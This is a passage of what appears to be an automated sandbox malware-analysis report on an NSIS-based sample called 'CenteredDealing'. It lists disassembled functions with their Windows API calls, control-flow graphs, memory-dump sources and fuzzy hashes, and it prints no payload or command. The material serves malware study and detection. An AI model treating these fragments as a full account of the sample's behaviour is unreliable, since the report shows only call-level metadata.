                                                                                                                                                                                                                                                                control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(007F0D08), ref: 00402387
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                • String ID: Exch: stack < %d elements$Pop: stack empty$TemperatureHighHunterTrash
                                                                                                                                                                                                                                                                • API String ID: 1459762280-3615923275
                                                                                                                                                                                                                                                                • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                                                                                                                                                                                Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(007F0D08), ref: 00402387
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                                                                                                                                                Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                                                                                                                                                Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                • String ID: <RM>$TemperatureHighHunterTrash$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                • API String ID: 247603264-4140014528
                                                                                                                                                                                                                                                                • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                                                                                                                                                Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                                                                                                Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                                                                                                Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                                                                                Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                                                                                Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                                                                                Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
